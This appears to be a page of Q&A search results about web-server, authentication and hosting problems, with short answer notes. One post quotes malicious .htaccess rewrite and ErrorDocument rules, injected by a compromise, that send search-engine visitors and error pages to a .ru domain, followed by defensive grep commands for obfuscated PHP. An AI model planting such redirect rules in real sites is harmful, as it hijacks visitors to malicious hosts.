Search Results

Search found 62215 results on 2489 pages for 'http basic authentication'.


  • deploying war on tomcat fails to start

    - by Asghar
    I have a Java application which uses JAX-WS. When I deployed it on my Tomcat 5 server, it deployed successfully, but it fails to start:

        SEVERE: WSSERVLET11: failed to parse runtime descriptor: java.lang.IllegalArgumentException: prefix cannot be "null" when creating a QName
        java.lang.IllegalArgumentException: prefix cannot be "null" when creating a QName
            at javax.xml.namespace.QName.<init>(xml-commons-apis-1.3.02.jar.so)
            at gnu.xml.stream.XMLParser.getAttributeName(libgcj.so.7rh)
            at com.sun.xml.ws.util.xml.XMLStreamReaderFilter.getAttributeName(XMLStreamReaderFilter.java:228)
            at com.sun.xml.ws.streaming.XMLStreamReaderUtil$AttributesImpl.<init>(XMLStreamReaderUtil.java:355)
            at com.sun.xml.ws.streaming.XMLStreamReaderUtil.getAttributes(XMLStreamReaderUtil.java:198)
            at com.sun.xml.ws.transport.http.DeploymentDescriptorParser.parseAdapters(DeploymentDescriptorParser.java:204)
            at com.sun.xml.ws.transport.http.DeploymentDescriptorParser.parse(DeploymentDescriptorParser.java:147)
            at com.sun.xml.ws.transport.http.servlet.WSServletContextListener.contextInitialized(WSServletContextListener.java:124)
            at org.apache.catalina.core.StandardContext.listenerStart(catalina-5.5.23.jar.so)
            at org.apache.catalina.core.StandardContext.start(catalina-5.5.23.jar.so)
            at org.apache.catalina.manager.ManagerServlet.start(catalina-manager-5.5.23.jar.so)
            at org.apache.catalina.manager.HTMLManagerServlet.start(catalina-manager-5.5.23.jar.so)
            at org.apache.catalina.manager.HTMLManagerServlet.doGet(catalina-manager-5.5.23.jar.so)
            at javax.servlet.http.HttpServlet.service(tomcat5-servlet-2.4-api-5.5.23.jar.so)
            at javax.servlet.http.HttpServlet.service(tomcat5-servlet-2.4-api-5.5.23.jar.so)
            at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(catalina-5.5.23.jar.so)
            at org.apache.catalina.core.ApplicationFilterChain.doFilter(catalina-5.5.23.jar.so)
            at org.apache.catalina.core.StandardWrapperValve.invoke(catalina-5.5.23.jar.so)
            at org.apache.catalina.core.StandardContextValve.invoke(catalina-5.5.23.jar.so)
            at org.apache.catalina.authenticator.AuthenticatorBase.invoke(catalina-5.5.23.jar.so)
            at org.apache.catalina.core.StandardHostValve.invoke(catalina-5.5.23.jar.so)
            at org.apache.catalina.valves.ErrorReportValve.invoke(catalina-5.5.23.jar.so)
            at org.apache.catalina.core.StandardEngineValve.invoke(catalina-5.5.23.jar.so)
            at org.apache.catalina.connector.CoyoteAdapter.service(catalina-5.5.23.jar.so)
            at org.apache.coyote.http11.Http11Processor.process(tomcat-http-5.5.23.jar.so)
            at org.apache.coyote.http11.Http11BaseProtocol$Http11ConnectionHandler.processConnection(tomcat-http-5.5.23.jar.so)
            at org.apache.tomcat.util.net.PoolTcpEndpoint.processSocket(tomcat-util-5.5.23.jar.so)
            at org.apache.tomcat.util.net.LeaderFollowerWorkerThread.runIt(tomcat-util-5.5.23.jar.so)
            at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(tomcat-util-5.5.23.jar.so)
            at java.lang.Thread.run(libgcj.so.7rh)
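    The trace shows the descriptor being parsed by gnu.xml.stream.XMLParser from libgcj (the GNU Classpath XML parser) rather than a fully compliant StAX implementation, which suggests the JVM in use is GCJ; running Tomcat on a Sun/Oracle JDK is worth checking. As a hedged illustration only (the service name and class are hypothetical placeholders, not taken from the question), a minimal WEB-INF/sun-jaxws.xml that declares its namespace explicitly looks like this:

        <?xml version="1.0" encoding="UTF-8"?>
        <endpoints xmlns="http://java.sun.com/xml/ns/jax-ws/ri/runtime"
                   version="2.0">
          <!-- "MyService" and the implementation class are placeholders -->
          <endpoint name="MyService"
                    implementation="com.example.MyServiceImpl"
                    url-pattern="/myservice"/>
        </endpoints>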


  • SharePoint, Exchange and Incoming Emails Without Directory Management Services

    - by Nariman
    Trying to keep this as simple as possible. We've already created the email accounts that we need (e.g. account[1-20]@domain.com) on Exchange/AD. We'd like to now enable incoming emails on SharePoint 2007 lists corresponding to these accounts. My thinking is we don't need to configure Directory Management Services [2] - the architecture will be simpler without it and the application doesn't require these services. However, we still need to route messages from Exchange to either local SMTP services (via the connector described in the articles below) or by user-specific drop-folder settings (if permitted by Exchange). So the question is: can we instruct Exchange to use a drop folder just for accounts account[1-20]@domain.com? Or do we need to change the accounts to account[1-20]@sharepointsmtp.domain.com and re-route those messages to the local SMTP service that will drop them on disk? I've read the material below.

    [1]
    http://www.combined-knowledge.com/Downloads/2007/How%20to%20configure%20Email%20Enabled%20Lists%20in%20Moss2007%20RTM%20using%20Exchange%202007.pdf
    http://social.msdn.microsoft.com/Forums/en/sharepointdevelopment/thread/91e0c3d2-afe6-469d-b1bc-6ae7a9aa287e
    http://gj80blogtech.blogspot.com/2009/12/configure-incoming-email-setting-in.html
    http://www.jasonslater.co.uk/2007/08/10/configuring-incoming-mail-on-moss-2007-and-exchange-2007/
    http://technet.microsoft.com/en-us/library/cc262947%28office.12%29.aspx
    http://technet.microsoft.com/en-us/library/cc263260%28office.12%29.aspx

    [2]
    http://graycloud.com/sharepoint/incoming-mail-configuration-what-permissions-are-require-t39483.html
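    If the second option (a dedicated sub-domain) is chosen, a hedged Exchange 2007 Management Shell sketch of routing that address space to the server running the SharePoint SMTP service would look like this (the smart host name is a placeholder assumption):

        New-SendConnector -Name "SharePoint incoming mail" `
            -AddressSpaces "sharepointsmtp.domain.com" `
            -SmartHosts "moss-wfe-01.domain.com" `
            -DNSRoutingEnabled $false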


  • Davical + LDAP + NTLM

    - by slavizh
    I have set up a Davical server on CentOS, configured to use LDAP so that users authenticate to the Davical server with their usernames and passwords. I am using Lightning as the client software for calendaring. Using Lightning requires entering a username and password every time, so I decided to set up NTLM: I want my users, who are logged into the domain, to use the calendar server through Lightning without entering a username and password. I've set up NTLM on the Davical server. But when a user tries to reach the calendar through Lightning, the server first asks for the NTLM username and password and then asks for the LDAP username and password. It becomes something like double authentication. The problem is that NTLM requires domain\username and password while Davical through LDAP requires only username and password. So my questions are: Is there a way to change something in Davical so that Davical through LDAP requires domain\username and password authentication? That way, the second authentication could proceed silently through NTLM and the users would use Lightning without entering usernames and passwords. Is there a way I can make this double authentication become one and use only NTLM? P.S. We have a Samba domain with an LDAP server and our users use Thunderbird for their mail, and I want to add Lightning too, so that they have a calendar service. But I don't want them to enter a username and password for the calendar every time they log in. I know they can save that password, but that is not an option for my organization.


  • Service nginx reload: unexpected error

    - by Anna
    I'm trying to install WordPress on my nginx server by following this tutorial: http://premium.wpmudev.org/blog/how-to-setup-your-own-nginx-powered-wordpress-server/ However, the last command at step 7, service nginx reload, gave me a strange error. A copy-paste from my terminal:

        root@server:~# service nginx reload
        Reloading nginx configuration: nginx: [emerg] unexpected "o" in /etc/nginx/sites-enabled/wordpress:7
        nginx: configuration file /etc/nginx/nginx.conf test failed

    When I nano into sites-enabled/wordpress, on the 7th line I can't find anything strange:

        <!DOCTYPE html>
        <html class=" ">
        <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# object: http://ogp.me/ns/object# article: http://ogp.me/ns/article# profile: http://ogp.me/ns/profile#">
        <meta charset='utf-8'>
        <meta http-equiv="X-UA-Compatible" content="IE=edge">

    Also, I don't see any obvious errors in my nginx.conf file, but maybe I'm not checking something? The first couple of lines of the nginx config file:

        user www-data;
        worker_processes 4;
        pid /var/run/nginx.pid;

        events {
            worker_connections 768;
            # multi_accept on;
        }

    Any help is appreciated, thanks a lot in advance!
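    For context, the pasted contents of sites-enabled/wordpress are HTML, not nginx directives, which suggests the tutorial web page itself was saved into the file; nginx then fails on the first token it cannot parse. A minimal server block of the kind such tutorials use (the domain, paths, and PHP-FPM socket are placeholder assumptions) would instead look like:

        server {
            listen 80;
            server_name example.com;          # placeholder domain
            root /var/www/wordpress;          # placeholder path
            index index.php;

            location / {
                # hand pretty permalinks to WordPress
                try_files $uri $uri/ /index.php?$args;
            }

            location ~ \.php$ {
                include fastcgi_params;
                fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
                fastcgi_pass unix:/var/run/php5-fpm.sock;  # assumes a PHP-FPM socket
            }
        }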


  • "could not find suitable fingerprints matched to available hardware" error

    - by Alex
    I have a ThinkPad T61 with a UPEK fingerprint reader. I'm running Ubuntu 9.10, with fprint installed. Everything works fine (I am able to swipe my fingerprint to authenticate any permission dialogues or "sudo" prompts successfully) except for actually logging onto my laptop when I boot up or end my session. I receive an error below the GNOME login that says "Could not locate any suitable fingerprints matched to available hardware." What is causing this? Here are the contents of the /etc/pam.d/common-auth file:

        #
        # /etc/pam.d/common-auth - authentication settings common to all services
        #
        # This file is included from other service-specific PAM config files,
        # and should contain a list of the authentication modules that define
        # the central authentication scheme for use on the system
        # (e.g., /etc/shadow, LDAP, Kerberos, etc.). The default is to use the
        # traditional Unix authentication mechanisms.
        #
        # As of pam 1.0.1-6, this file is managed by pam-auth-update by default.
        # To take advantage of this, it is recommended that you configure any
        # local modules either before or after the default block, and use
        # pam-auth-update to manage selection of other modules. See
        # pam-auth-update(8) for details.

        # here are the per-package modules (the "Primary" block)
        auth sufficient pam_fprint.so
        auth [success=1 default=ignore] pam_unix.so nullok_secure
        # here's the fallback if no module succeeds
        auth requisite pam_deny.so
        # prime the stack with a positive return value if there isn't one already;
        # this avoids us returning an error just because nothing sets a success code
        # since the modules above will each just jump around
        auth required pam_permit.so
        # and here are more per-package modules (the "Additional" block)
        auth optional pam_ecryptfs.so unwrap
        # end of pam-auth-update config
        #auth sufficient pam_fprint.so
        #auth required pam_unix.so nullok_secure


  • setting up tracd behind mod_proxy?

    - by FilmJ
    I'm having trouble setting up mod_proxy and tracd. Almost all the search results for this problem take me to the built-in Trac documentation page that mentions it as an option. I have several VirtualServers already running on the box in question, so running tracd on port 80 or 443 is not an option, but I do want to make my Trac server accessible on this machine without exposing an additional port via the firewall. Making things even more complicated, I have multiple Trac repositories being served by the same instance of tracd, so I want to set it up so that http://trac.abc.com is proxied to localhost:8000/projects/abcproject, and http://trac.def.com is proxied to localhost:8000/projects/defproject. Currently, the setup I have below results in 100% 403 errors. The server is running as www-data and the directory where all Trac files are stored is owned by www-data, AND tracd (as shown below) is running as www-data, so I'm not sure where it's getting hung up.

    The relevant configuration in /var/apache2/sites-enabled/trac.abc.com:

        ProxyPass / http://localhost:8000/abcproject
        ProxyPassReverse / http://localhost:8000/abcproject

    The relevant configuration in /var/apache2/sites-enabled/trac.def.com:

        ProxyPass / http://localhost:8000/defproject
        ProxyPassReverse / http://localhost:8000/defproject

    The command used to instantiate tracd:

        tracd -a defproject,/var/www/vhosts/trac-common/users.htdigest,DEFProject \
              -a abcproject,/var/www/vhosts/trac-common/users.htdigest,ABCProject \
              -p 8000 -b localhost -e /var/www/vhosts/trac-common/projects

    If I access the site at http://localhost:8000/ everything works fine, but if I try to access via any of the proxied hosts I end up with 403 at every turn. I've used mod_proxy successfully as described above for other servers, such as CouchDB, so maybe this has to do with the headers sent by tracd??
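    As an aside, a frequent cause of blanket 403s with mod_proxy on Apache 2.2 is the request being denied by the default <Proxy> policy, independent of tracd's own permissions. A hedged sketch for the trac.abc.com vhost (the Allow block and the trailing slashes are assumptions to test, not a confirmed fix):

        ProxyRequests Off
        <Proxy *>
            Order allow,deny
            Allow from all
        </Proxy>
        ProxyPass        / http://localhost:8000/abcproject/
        ProxyPassReverse / http://localhost:8000/abcproject/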


  • Redirecting a single request to another page, ignoring www subdomain

    - by Petter Brodin
    I have a site running on IIS 7.5 that does an automatic redirect from 'http://mysite.com/whatever.aspx' to 'http://www.mysite.com/whatever.aspx'. On the site, there is a lot of traffic to an old URL that I want to redirect to the front page, index.aspx: 'http://mysite.com/foo/bar/index.cgi%something=asdf&somethingelse=qwerty'. The problem is that no matter what I try, I can only get the redirect to work with the www subdomain. If I use the URL without www, I just end up at 'http://www.mysite.com/404.aspx'. Any ideas? Thanks in advance for all help!

    Edit3: it seems like the browser caching the redirect response was messing with me, so Edit2 is wrong. See my response below.

    Edit2: disregard Edit1, it doesn't seem like it's working after all.

    Edit: here's some further info: using this article I've managed to redirect from 'http://mysite.com/foo/bar/index.cgi' to 'http://www.mysite.com/index.aspx', but if I add the query string parameters, it still redirects to 'http://www.mysite.com/404.aspx'. Isn't there a way to catch all requests to the cgi file, including query string parameters?
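    For reference, a hedged sketch of an IIS URL Rewrite rule for this kind of redirect; the pattern matches the old path on any host (query strings are not part of the match by default), and the rule is illustrative rather than a tested fix:

        <system.webServer>
          <rewrite>
            <rules>
              <rule name="Old cgi URL to front page" stopProcessing="true">
                <match url="^foo/bar/index\.cgi$" />
                <action type="Redirect" url="http://www.mysite.com/index.aspx"
                        redirectType="Permanent" appendQueryString="false" />
              </rule>
            </rules>
          </rewrite>
        </system.webServer>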


  • Wordpress Forbidden page

    - by ffffff
    The page comes back with an empty body. If I open preview mode without logging in (so without authorization), the response HTML is this:

        <html xmlns="http://www.w3.org/1999/xhtml" lang="ja" xml:lang="ja">
        <head profile="http://purl.org/net/ns/metaprof">
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <meta http-equiv="Content-Script-Type" content="text/javascript" />
        <meta name="generator" content="WordPress 2.9.2" />
        <meta name="author" content="blog" />
        <link rel="alternate" type="application/atom+xml" href="http://blog.example.com/feed/atom/" title="Atom cite contents" />
        <link rel="start" href="http://blog.example.com" title="blog Home" />
        <link rel="stylesheet" type="text/css" href="http://blog.example.com/wp-content/themes/blog/style.css" />
        <meta name="description" content="blog" />
        <title>blog - </title>
        </head>
        <body class="individual single">
        </div>
        </body>
        </html>

    Do you have any solutions?


  • How can I upgrade from Ubuntu Intrepid Ibex 8.10 to Jaunty 9.04 when old-releases no longer has the necessary packages?

    - by tommy chheng
    I changed my sources.list to:

        deb http://old-releases.ubuntu.com/ubuntu/ intrepid main restricted universe multiverse
        deb http://old-releases.ubuntu.com/ubuntu/ intrepid-updates main restricted universe multiverse
        deb http://old-releases.ubuntu.com/ubuntu/ intrepid-security main restricted universe multiverse

    I tried installing with sudo apt-get install update-manager-core but I get this error:

        1 upgraded, 3 newly installed, 0 to remove and 40 not upgraded.
        Need to get 2506kB/2555kB of archives.
        After this operation, 4346kB of additional disk space will be used.
        Do you want to continue [Y/n]? Y
        Err http://old-releases.ubuntu.com intrepid-updates/main update-manager-core 1:0.93.34
          404 Not Found
        Err http://old-releases.ubuntu.com intrepid-security/main dpkg 1.14.20ubuntu6.3
          404 Not Found
        Failed to fetch http://old-releases.ubuntu.com/ubuntu/pool/main/d/dpkg/dpkg_1.14.20ubuntu6.3_amd64.deb 404 Not Found
        Failed to fetch http://old-releases.ubuntu.com/ubuntu/pool/main/u/update-manager/update-manager-core_0.93.34_amd64.deb 404 Not Found
        E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?

    Running apt-get update or --fix-missing returns the same errors. How can I successfully upgrade from Intrepid Ibex to Jaunty 9.04?
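    One hedged suggestion implied by the 404s: the package index apt is working from may still predate the sources.list change, so the version numbers it requests no longer exist on old-releases. Refreshing the index before installing is worth a try:

        sudo apt-get clean                       # drop partially fetched archives
        sudo apt-get update                      # rebuild indexes from old-releases
        sudo apt-get install update-manager-core
        sudo do-release-upgrade                  # then attempt the 8.10 -> 9.04 upgrade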


  • shared hosting with malware, .htaccess file gets modified every 2 hours or so

    - by apache
    I spent all day today chasing malware on the shared hosting for one of my clients. The issue is as follows: every 2 hours or so the .htaccess file and all other .htaccess files get modified. At the top of each file these lines are added:

        <IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
        RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L]
        </IfModule>

    and at the bottom:

        ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8
        ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8
        ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8
        ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8
        ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8

    The main problem is I'm not root on the server and cannot sudo, as this is shared hosting with hundreds of websites. Typical good commands like dmesg, lsof, dtrace, chattr and many others are not available to me as I'm not root. I can't find out who is modifying the .htaccess files; how do I get that info? My guess is some PHP script is changing them, called from outside via command and control. This seems to relate to this: http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/ How do I find out who is modifying .htaccess files without being root?
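    Without root, one unprivileged starting point (a hedged sketch; adjust the path to the account's docroot) is to look for files whose modification times cluster around the .htaccess rewrites, and to grep the account's PHP for common obfuscation primitives:

        # files in the account changed within the last 2 hours
        find ~/public_html -type f -mmin -120 -ls

        # PHP using the usual obfuscation/eval patterns
        grep -rn --include='*.php' -E 'base64_decode|eval\(|gzinflate' ~/public_html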


  • Redirect from folder containing website

    - by Sam
    I have a website reached from this URL: http://www.mysite.com/cms/index.php being served from this directory: public_html/cms/index.php. In public_html I have this .htaccess:

        RewriteRule (.*) cms/$1 [L]

    which lets me get to the site like this: http://www.mysite.com/index.php. But now if I reference the 'old' address, I'd like to redirect to the rewritten address with a permanent redirect code. For example, http://www.mysite.com/cms/?q=node/1 is redirected to... http://www.mysite.com/?q=node/1. How can I make this happen?

    EDIT: Also in the .htaccess file supplied with Drupal (the cms), this is written. I've tried enabling it, but it doesn't seem to have any effect.

        # Modify the RewriteBase if you are using Drupal in a subdirectory or in a
        # VirtualDocumentRoot and the rewrite rules are not working properly.
        # For example if your site is at http://example.com/drupal uncomment and
        # modify the following line:
        # RewriteBase /drupal

    EDIT: Including more of my .htaccess file - seems relevant.

        # Block access to "hidden" directories whose names begin with a period.
        RewriteRule "(^|/)\." - [F]

        # Strip cms folder from url
        RewriteRule (.*) cms/$1

        RewriteCond %{REQUEST_FILENAME} !-f
        RewriteCond %{REQUEST_FILENAME} !-d
        RewriteCond %{REQUEST_URI} !=/favicon.ico
        RewriteRule ^ index.php [L]

        # Rules to correctly serve gzip compressed CSS and JS files.
        # Requires both mod_rewrite and mod_headers to be enabled.
        <IfModule mod_headers.c>
          # Serve gzip compressed CSS files if they exist and the client accepts gzip.
          RewriteCond %{HTTP:Accept-encoding} gzip
          RewriteCond %{REQUEST_FILENAME}\.gz -s
          RewriteRule ^(.*)\.css $1\.css\.gz [QSA]

          # Serve gzip compressed JS files if they exist and the client accepts gzip.
          RewriteCond %{HTTP:Accept-encoding} gzip
          RewriteCond %{REQUEST_FILENAME}\.gz -s
          RewriteRule ^(.*)\.js $1\.js\.gz [QSA]

          # Serve correct content types, and prevent mod_deflate double gzip.
          RewriteRule \.css\.gz$ - [T=text/css,E=no-gzip:1]
          RewriteRule \.js\.gz$ - [T=text/javascript,E=no-gzip:1]

          <FilesMatch "(\.js\.gz|\.css\.gz)$">
            # Serve correct encoding type.
            Header append Content-Encoding gzip
            # Force proxies to cache gzipped & non-gzipped css/js files separately.
            Header append Vary Accept-Encoding
          </FilesMatch>
        </IfModule>
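    A hedged sketch of the requested permanent redirect, placed above the internal "cms/" rewrite: the THE_REQUEST condition matches only what the client actually asked for, so the rule does not loop on internally rewritten URLs, and the query string (?q=node/1) is carried over automatically on external redirects:

        # externally requested /cms/... -> permanent redirect to /
        RewriteCond %{THE_REQUEST} ^[A-Z]+\ /cms/ [NC]
        RewriteRule ^cms/(.*)$ /$1 [R=301,L]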


  • Host couldn't be reached by domain name, only by IP: Apache's fault?

    - by MaxArt
    I have this Windows Server 2003 R2 32-bit machine running Apache 2.4.2 with OpenSSL 1.0.1c and PHP 5.4.5 via mod_fcgid 2.3.7. This config worked just fine for some hours, but then the site couldn't be reached with its domain name, say www.example.com, though it could still be reached by its IP address. In particular, while https://www.example.com/ yielded a connection error, http://123.1.2.3/ worked just fine. Yes, first https then http. Error and access logs were clean, i.e. they showed no signs of problems: just the usual messages, which were interrupted while the site couldn't be reached. After some investigation, a simple restart of Apache solved the problem. Unfortunately, I didn't have the chance to test whether https://123.1.2.3/ worked as well, or whether http://www.example.com/ was still redirected to https as usual. So, does anyone have any idea of what happened? Before I get tired of Apache and ditch it in favor of Nginx?

    Edit: Some log information. The last line of sslerror.log is from 90 minutes before the problem occurred, so I guess it's not important. ssl_request.log shows nothing interesting either; these are the last two lines before the problem:

        [28/Aug/2012:17:47:54 +0200] x.x.x.x TLSv1.1 ECDHE-RSA-AES256-SHA "GET /login HTTP/1.1" 1183
        [28/Aug/2012:17:47:45 +0200] y.y.y.y TLSv1 ECDHE-RSA-AES256-SHA "POST /upf HTTP/1.1" 73

    The previous lines are all the same and don't seem interesting, except four lines like these 30-40 seconds before the problem:

        [28/Aug/2012:17:47:14 +0200] z.z.z.z TLSv1 ECDHE-RSA-AES256-SHA "-" -

    These are the corresponding lines from sslaccess.log:

        z.z.z.z - - [28/Aug/2012:17:47:14 +0200] "-" 408 -
        ...
        x.x.x.x - - [28/Aug/2012:17:47:54 +0200] "GET /login HTTP/1.1" 200 1183
        y.y.y.y - - [28/Aug/2012:17:47:45 +0200] "POST /upf HTTP/1.1" 200 73


  • Reset rc.d so software starts at boot again

    - by natli
    I ran the following 2 commands on my VPS box and now it boots without starting any software at all. According to rcconf it's still supposed to start my chosen software (ssh etc.) but it doesn't.

        update-rc.d vz defaults
        update-rc.d vzeventd defaults

    I already tried removing them again with

        update-rc.d -f vz remove
        update-rc.d -f vzeventd remove

    but that didn't change anything. /etc/rc.local also still correctly lists some scripts I want to run at start-up, but they don't seem to be called either. I expect the top 2 commands to be responsible, but here's everything I did:

        mkdir /var/openvz-dl
        cd /var/openvz-dl
        wget http://download.openvz.org/kernel/branches/rhel6-2.6.32/042stab062.2/vzkernel-2.6.32-042stab062.2.x86_64.rpm
        wget http://download.openvz.org/kernel/branches/rhel6-2.6.32/042stab062.2/vzkernel-devel-2.6.32-042stab062.2.x86_64.rpm
        wget http://download.openvz.org/utils/vzctl/4.0/vzctl-4.0-1.x86_64.rpm
        wget http://download.openvz.org/utils/vzctl/4.0/vzctl-core-4.0-1.x86_64.rpm
        wget http://download.openvz.org/utils/ploop/1.5/ploop-1.5-1.x86_64.rpm
        wget http://download.openvz.org/utils/ploop/1.5/ploop-lib-1.5-1.x86_64.rpm
        wget http://download.openvz.org/utils/vzquota/3.1/vzquota-3.1-1.x86_64.rpm
        apt-get install fakeroot alien
        fakeroot alien --to-deb --scripts --keep-version vz*.rpm ploop*.rpm
        dpkg -i vz*.deb ploop*.deb --force-overwrite
        update-rc.d vz defaults
        update-rc.d vzeventd defaults
        reboot

    A huge part of that failed because I was running it on an OpenVZ VPS, which has a shared kernel that can't be altered, so I also had to fix dpkg like so (it was moaning about wanting to install vzkernel with a package not being found):

        rm /var/lib/dpkg/info/vzkernel*
        dpkg-reconfigure vzkernel --force
        dpkg --purge --force-all vzkernel

    But that didn't fix the boot issue either. How do I make my software start at boot again?
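    A hedged first check (assuming Debian's standard sysv-rc layout): see whether the runlevel directories still contain start links at all, and whether re-registering a known service recreates them:

        ls -l /etc/rc2.d/            # S??* symlinks are what init starts at boot
        update-rc.d -f ssh remove    # clear any broken registration for one service
        update-rc.d ssh defaults     # recreate the standard S/K links, then reboot to test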


  • Loadbalancing with nginx and tomcat

    - by London
    Hello, this should be fairly easy to answer for any system admin. The problem is that I'm not a server admin but I have to complete this task; I'm very close but still not managing to do it. Here is what I mean: I have two Tomcat instances running on machine1 and machine2. People usually access those by visiting the URLs:

        http://machine1:8080/appName
        http://machine2:9090/appName

    The problem is that when I set up nginx with the domain name, i.e. domain.com, nginx sends requests to http://machine1:8080/ and http://machine2:9090/ instead of http://machine1:8080/appName and http://machine2:9090/appName. Here is my configuration (very basic, as can be noted):

        upstream backend {
            server machine1:8080;
            server machine2:9090;
        }

        server {
            listen 80;
            server_name www.mydomain.com mydomain.com;

            location / {
                # needed to forward user's IP address to rails
                proxy_set_header X-Real-IP $remote_addr;
                # needed for HTTPS
                proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                proxy_set_header Host $http_host;
                proxy_redirect off;
                proxy_max_temp_file_size 0;
                proxy_pass http://backend;
            } #end location
        } #end server

    What changes must I make to do the following: when a user visits mydomain.com, transfer him to either machine1:8080/appName or machine2:9090/appName. Thank you
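    A hedged sketch of the usual fix: giving proxy_pass a URI part makes nginx replace the matched location prefix with that URI when talking to the upstream, so "/" on the front end maps to "/appName/" on both Tomcats (the trailing slashes matter here):

        location / {
            proxy_set_header X-Real-IP       $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_set_header Host            $http_host;
            proxy_redirect off;
            # "/" is rewritten to "/appName/" before the request reaches the backend
            proxy_pass http://backend/appName/;
        }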


  • Removing HttpModule for specific path in ASP.NET / IIS 7 application?

    - by soccerdad
    Most succinctly, my question is whether an ASP.NET 4.0 app running under IIS 7 integrated mode should be able to honor this portion of my Web.config file:

        <location path="auth/windows">
          <system.webServer>
            <modules>
              <remove name="FormsAuthentication"/>
            </modules>
          </system.webServer>
        </location>

    I'm experimenting with mixed mode authentication (Windows and Forms). Using IIS Manager, I've disabled Anonymous authentication to auth/windows/winauth.aspx, which is within the location path above. I have Failed Request Tracing set up to trace various HTTP status codes, including 302s. When I request the winauth.aspx page, a 302 HTTP status code is returned. If I look at the request trace, I can see that a 401 (unauthorized) was originally generated by the AnonymousAuthenticationModule. However, the FormsAuthenticationModule converts that to a 302, which is what the browser sees. So it seems as though my attempt to remove that module from the pipeline for pages in that path isn't working. But I'm not seeing any complaints anywhere (event viewer, yellow pages of death, etc.) that would indicate it's an invalid configuration. I want the 401 returned to the browser, which presumably would include an appropriate WWW-Authenticate header. A few other points:

    a) I do have <authentication mode="Forms"> in my Web.config, and that is what the 302 redirects to;
    b) I got the "name" of the module I'm trying to remove from the inetserv\config\applicationHost.config file;
    c) I have this element in my Web.config file: <modules runAllManagedModulesForAllRequests="false">;
    d) I tried a <location> element for the path in which I set the authentication mode to "None", but that gave a yellow exception page saying the property can't be set below the application level.

    Anyone had any luck removing modules in this fashion?


  • Exchange 2010: Send emails via SMTP with custom From address to outside the domain

    - by marsze
    The requirement(s): (1) connect to Exchange via SMTP with (2) basic authentication, and send emails with a (3) custom From address to (4) recipients outside the domain. I was able to get (1) - (3) working. I created a dedicated receive connector for this task and configured it like this:

        Permissions:
          ms-Exch-SMTP-Accept-Any-Recipient (for authenticated users)
          ms-Exch-SMTP-Accept-Authoritative-Domain-Sender (for authenticated users)
          ms-Exch-SMTP-Accept-Any-Sender (for authenticated users)

        Authentication:
          TLS
          Basic Authentication (without TLS)
          Exchange Server Authentication

    However, I'm still struggling with (4): I can send with "fake" From addresses to recipients inside the domain. Also, I can send with the original From address to recipients outside the domain. Can you tell me what I'm missing to configure Exchange to send emails with changed From addresses to recipients outside the domain? (Or is this even possible at all?) Thanks.

    UPDATE: I have to correct myself: it seems to be working after all. There must have been some issue with the mailbox I used for testing. It turned out it's working with other external mailboxes. However, I still have no idea what was different there... Anyway, you can take this as documentation on how to configure Exchange in such a way ;)
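    For completeness, a hedged Exchange Management Shell sketch of granting those extended rights on such a receive connector (the connector name is a placeholder):

        Get-ReceiveConnector "Custom From Relay" | Add-ADPermission `
            -User "NT AUTHORITY\Authenticated Users" `
            -ExtendedRights "ms-Exch-SMTP-Accept-Any-Sender",
                            "ms-Exch-SMTP-Accept-Authoritative-Domain-Sender",
                            "ms-Exch-SMTP-Accept-Any-Recipient"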


  • How to access Virtual machine using powershell script

    - by Sheetal
    I want to access a virtual machine using a PowerShell script. For that I used the script below:

        Enter-PSSession -ComputerName sheetal-VDD -Credential compose04.com\abc.xyz1

    where sheetal-VDD is the hostname of the virtual machine, compose04.com is the domain name of the virtual machine, and abc.xyz1 is the username on the virtual machine. After entering the above command, it asks for a password. When the password is entered I get the error below:

        Enter-PSSession : Connecting to remote server failed with the following error message : WinRM cannot process the request. The following error occurred while using Kerberos authentication: There are currently no logon servers available to service the logon request.
        Possible causes are:
          -The user name or password specified are invalid.
          -Kerberos is used when no authentication method and no user name are specified.
          -Kerberos accepts domain user names, but not local user names.
          -The Service Principal Name (SPN) for the remote computer name and port does not exist.
          -The client and remote computers are in different domains and there is no trust between the two domains.
        After checking for the above issues, try the following:
          -Check the Event Viewer for events related to authentication.
          -Change the authentication method; add the destination computer to the WinRM TrustedHosts configuration setting or use HTTPS transport. Note that computers in the TrustedHosts list might not be authenticated.
          -For more information about WinRM configuration, run the following command: winrm help config.
        For more information, see the about_Remote_Troubleshooting Help topic.
        At line:1 char:16
        + Enter-PSSession <<<< -computername sheetal-VDD -credential compose04.com\Sheetal.Varpe
            + CategoryInfo          : InvalidArgument: (sheetal-VDD:String) [Enter-PSSession], PSRemotingTransportException
            + FullyQualifiedErrorId : CreateRemoteRunspaceFailed

    Can someone help me out with this?
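    A hedged workaround taken from the error text itself: when no logon server is reachable for Kerberos, adding the VM to the client's TrustedHosts list lets WinRM negotiate a non-Kerberos authentication instead (run elevated on the client, and note the security caveat the error message mentions):

        Set-Item WSMan:\localhost\Client\TrustedHosts -Value "sheetal-VDD" -Concatenate -Force
        Restart-Service WinRM
        Enter-PSSession -ComputerName sheetal-VDD -Credential compose04.com\abc.xyz1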


  • Slow loading Magento Commerce homepage

    - by Matt
    I have recently changed my website and it is loading really slowly: dancemidisamples.com. Here is a report: http://www.webpagetest.org/result/120906_78_ANK/ As far as I can tell there is an issue with this section of code:

        <link rel="icon" href="http://www.dancemidisamples.com/skin/frontend/base/default/favicon.ico" type="image/x-icon" />
        <link rel="shortcut icon" href="http://www.dancemidisamples.com/skin/frontend/base/default/favicon.ico" type="image/x-icon" />
